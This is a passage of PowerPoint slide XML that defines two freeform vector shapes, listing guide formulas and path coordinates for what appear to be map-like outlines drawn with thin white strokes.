              <p:cNvPr id="36398" name="Freeform 130"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3438" y="2256"/>
                <a:ext cx="305" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 305"/>
                  <a:gd name="T1" fmla="*/ 47 h 278"/>
                  <a:gd name="T2" fmla="*/ 3 w 305"/>
                  <a:gd name="T3" fmla="*/ 39 h 278"/>
                  <a:gd name="T4" fmla="*/ 6 w 305"/>
                  <a:gd name="T5" fmla="*/ 28 h 278"/>
                  <a:gd name="T6" fmla="*/ 1 w 305"/>
                  <a:gd name="T7" fmla="*/ 22 h 278"/>
                  <a:gd name="T8" fmla="*/ 5 w 305"/>
                  <a:gd name="T9" fmla="*/ 7 h 278"/>
                  <a:gd name="T10" fmla="*/ 10 w 305"/>
                  <a:gd name="T11" fmla="*/ 0 h 278"/>
                  <a:gd name="T12" fmla="*/ 20 w 305"/>
                  <a:gd name="T13" fmla="*/ 12 h 278"/>
                  <a:gd name="T14" fmla="*/ 31 w 305"/>
                  <a:gd name="T15" fmla="*/ 19 h 278"/>
                  <a:gd name="T16" fmla="*/ 38 w 305"/>
                  <a:gd name="T17" fmla="*/ 19 h 278"/>
                  <a:gd name="T18" fmla="*/ 50 w 305"/>
                  <a:gd name="T19" fmla="*/ 8 h 278"/>
                  <a:gd name="T20" fmla="*/ 65 w 305"/>
                  <a:gd name="T21" fmla="*/ 5 h 278"/>
                  <a:gd name="T22" fmla="*/ 64 w 305"/>
                  <a:gd name="T23" fmla="*/ 11 h 278"/>
                  <a:gd name="T24" fmla="*/ 63 w 305"/>
                  <a:gd name="T25" fmla="*/ 19 h 278"/>
                  <a:gd name="T26" fmla="*/ 71 w 305"/>
                  <a:gd name="T27" fmla="*/ 27 h 278"/>
                  <a:gd name="T28" fmla="*/ 74 w 305"/>
                  <a:gd name="T29" fmla="*/ 42 h 278"/>
                  <a:gd name="T30" fmla="*/ 92 w 305"/>
                  <a:gd name="T31" fmla="*/ 51 h 278"/>
                  <a:gd name="T32" fmla="*/ 103 w 305"/>
                  <a:gd name="T33" fmla="*/ 62 h 278"/>
                  <a:gd name="T34" fmla="*/ 136 w 305"/>
                  <a:gd name="T35" fmla="*/ 64 h 278"/>
                  <a:gd name="T36" fmla="*/ 159 w 305"/>
                  <a:gd name="T37" fmla="*/ 57 h 278"/>
                  <a:gd name="T38" fmla="*/ 165 w 305"/>
                  <a:gd name="T39" fmla="*/ 48 h 278"/>
                  <a:gd name="T40" fmla="*/ 179 w 305"/>
                  <a:gd name="T41" fmla="*/ 35 h 278"/>
                  <a:gd name="T42" fmla="*/ 195 w 305"/>
                  <a:gd name="T43" fmla="*/ 32 h 278"/>
                  <a:gd name="T44" fmla="*/ 212 w 305"/>
                  <a:gd name="T45" fmla="*/ 36 h 278"/>
                  <a:gd name="T46" fmla="*/ 232 w 305"/>
                  <a:gd name="T47" fmla="*/ 43 h 278"/>
                  <a:gd name="T48" fmla="*/ 259 w 305"/>
                  <a:gd name="T49" fmla="*/ 64 h 278"/>
                  <a:gd name="T50" fmla="*/ 271 w 305"/>
                  <a:gd name="T51" fmla="*/ 73 h 278"/>
                  <a:gd name="T52" fmla="*/ 271 w 305"/>
                  <a:gd name="T53" fmla="*/ 86 h 278"/>
                  <a:gd name="T54" fmla="*/ 264 w 305"/>
                  <a:gd name="T55" fmla="*/ 110 h 278"/>
                  <a:gd name="T56" fmla="*/ 261 w 305"/>
                  <a:gd name="T57" fmla="*/ 121 h 278"/>
                  <a:gd name="T58" fmla="*/ 262 w 305"/>
                  <a:gd name="T59" fmla="*/ 134 h 278"/>
                  <a:gd name="T60" fmla="*/ 267 w 305"/>
                  <a:gd name="T61" fmla="*/ 162 h 278"/>
                  <a:gd name="T62" fmla="*/ 281 w 305"/>
                  <a:gd name="T63" fmla="*/ 169 h 278"/>
                  <a:gd name="T64" fmla="*/ 266 w 305"/>
                  <a:gd name="T65" fmla="*/ 192 h 278"/>
                  <a:gd name="T66" fmla="*/ 284 w 305"/>
                  <a:gd name="T67" fmla="*/ 217 h 278"/>
                  <a:gd name="T68" fmla="*/ 297 w 305"/>
                  <a:gd name="T69" fmla="*/ 236 h 278"/>
                  <a:gd name="T70" fmla="*/ 305 w 305"/>
                  <a:gd name="T71" fmla="*/ 249 h 278"/>
                  <a:gd name="T72" fmla="*/ 289 w 305"/>
                  <a:gd name="T73" fmla="*/ 254 h 278"/>
                  <a:gd name="T74" fmla="*/ 279 w 305"/>
                  <a:gd name="T75" fmla="*/ 270 h 278"/>
                  <a:gd name="T76" fmla="*/ 265 w 305"/>
                  <a:gd name="T77" fmla="*/ 275 h 278"/>
                  <a:gd name="T78" fmla="*/ 242 w 305"/>
                  <a:gd name="T79" fmla="*/ 273 h 278"/>
                  <a:gd name="T80" fmla="*/ 227 w 305"/>
                  <a:gd name="T81" fmla="*/ 269 h 278"/>
                  <a:gd name="T82" fmla="*/ 213 w 305"/>
                  <a:gd name="T83" fmla="*/ 266 h 278"/>
                  <a:gd name="T84" fmla="*/ 207 w 305"/>
                  <a:gd name="T85" fmla="*/ 260 h 278"/>
                  <a:gd name="T86" fmla="*/ 202 w 305"/>
                  <a:gd name="T87" fmla="*/ 244 h 278"/>
                  <a:gd name="T88" fmla="*/ 191 w 305"/>
                  <a:gd name="T89" fmla="*/ 241 h 278"/>
                  <a:gd name="T90" fmla="*/ 181 w 305"/>
                  <a:gd name="T91" fmla="*/ 244 h 278"/>
                  <a:gd name="T92" fmla="*/ 170 w 305"/>
                  <a:gd name="T93" fmla="*/ 254 h 278"/>
                  <a:gd name="T94" fmla="*/ 148 w 305"/>
                  <a:gd name="T95" fmla="*/ 245 h 278"/>
                  <a:gd name="T96" fmla="*/ 133 w 305"/>
                  <a:gd name="T97" fmla="*/ 233 h 278"/>
                  <a:gd name="T98" fmla="*/ 116 w 305"/>
                  <a:gd name="T99" fmla="*/ 225 h 278"/>
                  <a:gd name="T100" fmla="*/ 105 w 305"/>
                  <a:gd name="T101" fmla="*/ 200 h 278"/>
                  <a:gd name="T102" fmla="*/ 87 w 305"/>
                  <a:gd name="T103" fmla="*/ 189 h 278"/>
                  <a:gd name="T104" fmla="*/ 82 w 305"/>
                  <a:gd name="T105" fmla="*/ 180 h 278"/>
                  <a:gd name="T106" fmla="*/ 74 w 305"/>
                  <a:gd name="T107" fmla="*/ 189 h 278"/>
                  <a:gd name="T108" fmla="*/ 64 w 305"/>
                  <a:gd name="T109" fmla="*/ 182 h 278"/>
                  <a:gd name="T110" fmla="*/ 62 w 305"/>
                  <a:gd name="T111" fmla="*/ 173 h 278"/>
                  <a:gd name="T112" fmla="*/ 59 w 305"/>
                  <a:gd name="T113" fmla="*/ 160 h 278"/>
                  <a:gd name="T114" fmla="*/ 51 w 305"/>
                  <a:gd name="T115" fmla="*/ 147 h 278"/>
                  <a:gd name="T116" fmla="*/ 33 w 305"/>
                  <a:gd name="T117" fmla="*/ 138 h 278"/>
                  <a:gd name="T118" fmla="*/ 23 w 305"/>
                  <a:gd name="T119" fmla="*/ 118 h 278"/>
                  <a:gd name="T120" fmla="*/ 34 w 305"/>
                  <a:gd name="T121" fmla="*/ 94 h 278"/>
                  <a:gd name="T122" fmla="*/ 27 w 305"/>
                  <a:gd name="T123" fmla="*/ 79 h 278"/>
                  <a:gd name="T124" fmla="*/ 12 w 305"/>
                  <a:gd name="T125" fmla="*/ 53 h 278"/>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305"/>
                  <a:gd name="T190" fmla="*/ 0 h 278"/>
                  <a:gd name="T191" fmla="*/ 305 w 305"/>
                  <a:gd name="T192" fmla="*/ 278 h 278"/>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305" h="278">
                    <a:moveTo>
                      <a:pt x="12" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="53"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36399" name="Freeform 131"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2933" y="2859"/>
                <a:ext cx="302" cy="300"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 302"/>
                  <a:gd name="T1" fmla="*/ 161 h 300"/>
                  <a:gd name="T2" fmla="*/ 34 w 302"/>
                  <a:gd name="T3" fmla="*/ 161 h 300"/>
                  <a:gd name="T4" fmla="*/ 50 w 302"/>
                  <a:gd name="T5" fmla="*/ 151 h 300"/>
                  <a:gd name="T6" fmla="*/ 60 w 302"/>
                  <a:gd name="T7" fmla="*/ 133 h 300"/>
                  <a:gd name="T8" fmla="*/ 67 w 302"/>
                  <a:gd name="T9" fmla="*/ 110 h 300"/>
                  <a:gd name="T10" fmla="*/ 83 w 302"/>
                  <a:gd name="T11" fmla="*/ 98 h 300"/>
                  <a:gd name="T12" fmla="*/ 88 w 302"/>
                  <a:gd name="T13" fmla="*/ 75 h 300"/>
                  <a:gd name="T14" fmla="*/ 93 w 302"/>
                  <a:gd name="T15" fmla="*/ 46 h 300"/>
                  <a:gd name="T16" fmla="*/ 100 w 302"/>
                  <a:gd name="T17" fmla="*/ 29 h 300"/>
                  <a:gd name="T18" fmla="*/ 101 w 302"/>
                  <a:gd name="T19" fmla="*/ 18 h 300"/>
                  <a:gd name="T20" fmla="*/ 113 w 302"/>
                  <a:gd name="T21" fmla="*/ 4 h 300"/>
                  <a:gd name="T22" fmla="*/ 127 w 302"/>
